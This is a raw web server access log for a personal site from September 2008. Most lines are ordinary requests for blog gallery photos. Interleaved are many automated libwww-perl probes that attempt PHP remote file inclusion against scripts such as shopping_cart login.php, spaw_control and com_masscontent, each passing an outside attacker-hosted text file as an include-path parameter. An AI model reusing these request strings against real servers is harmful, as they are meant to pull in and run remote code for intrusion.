72.199.235.196 - - [20/Sep/2008:09:09:53 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0135.jpg HTTP/1.1" 200 385989 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-069_0.jpg HTTP/1.1" 200 206667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:59 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1011.jpg HTTP/1.1" 200 306043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-014.jpg HTTP/1.1" 200 359926 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0152.jpg HTTP/1.1" 200 335197 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0117.jpg HTTP/1.1" 200 372417 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-010_1.jpg HTTP/1.1" 200 548534 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:10:11 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:10:11 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:10:11 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:12 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1026.jpg HTTP/1.1" 200 345929 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.253.223.90 - - [20/Sep/2008:09:10:12 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:10:15 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:16 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0136_0.jpg HTTP/1.1" 200 329003 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-215.jpg HTTP/1.1" 200 429846 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:19 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0004.jpg HTTP/1.1" 200 512676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-002_2.jpg HTTP/1.1" 200 430825 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:10:21 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:10:21 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:10:21 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:24 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1022.jpg HTTP/1.1" 200 289866 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:10:26 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:27 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/295b_1.jpg HTTP/1.1" 200 24839 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
61.100.183.215 - - [20/Sep/2008:09:10:28 -0700] "GET /logs/access_080524.log%20//?custompluginfile[]=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:28 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0158.jpg HTTP/1.1" 200 306017 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-130.jpg HTTP/1.1" 200 383009 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:32 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0025.jpg HTTP/1.1" 200 492834 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-153_0.jpg HTTP/1.1" 200 366130 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:37 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1010.jpg HTTP/1.1" 200 378608 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
61.100.183.215 - - [20/Sep/2008:09:10:40 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.183.215 - - [20/Sep/2008:09:10:40 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.183.215 - - [20/Sep/2008:09:10:41 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.183.215 - - [20/Sep/2008:09:10:41 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:41 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0166.jpg HTTP/1.1" 200 298247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-074_1.jpg HTTP/1.1" 200 387011 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:44 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0052.jpg HTTP/1.1" 200 433536 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-050_1.jpg HTTP/1.1" 200 254860 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:53 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0177.jpg HTTP/1.1" 200 348079 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:57 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0066.jpg HTTP/1.1" 200 335169 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:10:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017.jpg HTTP/1.1" 200 337700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:00 -0700] "GET /logs/access_080102.log/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:00 -0700] "GET /logs/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:00 -0700] "GET /logs/access_080118.log/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:01 -0700] "GET /index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92491 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:04 -0700] "GET /logs/access_080102.log/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:04 -0700] "GET /logs/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:04 -0700] "GET /logs/access_080118.log/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:05 -0700] "GET /index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92475 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:05 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0161.jpg HTTP/1.1" 200 448957 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:06 -0700] "GET /logs/access_080109.log%20/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-161_0.jpg HTTP/1.1" 200 480278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:06 -0700] "GET /logs/access_080207.log%20/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:09 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0046.jpg HTTP/1.1" 200 366761 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:11:12 -0700] "GET /logs/access_080102.log/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:11:12 -0700] "GET /logs/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:13 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/1677_1.jpg HTTP/1.1" 200 27579 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:11:13 -0700] "GET /logs/access_080118.log/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:11:14 -0700] "GET /index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92475 "-" "libwww-perl/5.814" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:15 -0700] "GET /logs/access_080109.log%20/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:11:15 -0700] "GET /logs/access_080207.log%20/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:11:16 -0700] "GET /logs/access_080109.log/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:18 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0159.jpg HTTP/1.1" 200 381231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:11:18 -0700] "GET /logs/access_080207.log%20/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:11:18 -0700] "GET /logs/access_080109.log%20/index.php?option=com_masscontent&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-190.jpg HTTP/1.1" 200 318250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:11:18 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:11:18 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:11:19 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:21 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0015.jpg HTTP/1.1" 200 400412 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:11:21 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-138.jpg HTTP/1.1" 200 562801 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:11:24 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:11:24 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:11:24 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:11:24 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:25 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/01d2_1.jpg HTTP/1.1" 200 23316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:30 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0143.jpg HTTP/1.1" 200 332772 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-275.jpg HTTP/1.1" 200 309469 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
222.231.24.53 - - [20/Sep/2008:09:11:33 -0700] "GET /logs/access_080826.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.53 - - [20/Sep/2008:09:11:33 -0700] "GET /logs/access_080817.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0132.jpg HTTP/1.1" 200 286102 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-181_0.jpg HTTP/1.1" 200 316719 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:42 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0163.jpg HTTP/1.1" 200 346344 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-259.jpg HTTP/1.1" 200 504997 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.214.44.182 - - [20/Sep/2008:09:11:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-182.jpg HTTP/1.1" 200 280449 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
79.23.245.57 - - [20/Sep/2008:09:11:46 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tribochina.com//components/com_simpleboard/nuovo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.23.245.57 - - [20/Sep/2008:09:11:47 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tribochina.com//components/com_simpleboard/nuovo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:47 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0047.jpg HTTP/1.1" 200 355990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.13.230.70 - - [20/Sep/2008:09:11:48 -0700] "GET /index2.php?content=http://h1.ripway.com/diana22/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:54 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.1" 200 344712 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037_1.jpg HTTP/1.1" 200 453244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:57 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1014.jpg HTTP/1.1" 200 465585 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:59 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-029.jpg HTTP/1.1" 200 464578 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:11:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0116.jpg HTTP/1.1" 200 454696 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:12:03 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:12:03 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:12:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:12:05 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:12:07 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0172.jpg HTTP/1.1" 200 364812 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:12:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-105_1.jpg HTTP/1.1" 200 278856 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
87.28.81.20 - - [20/Sep/2008:09:12:11 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.28.81.20 - - [20/Sep/2008:09:12:11 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
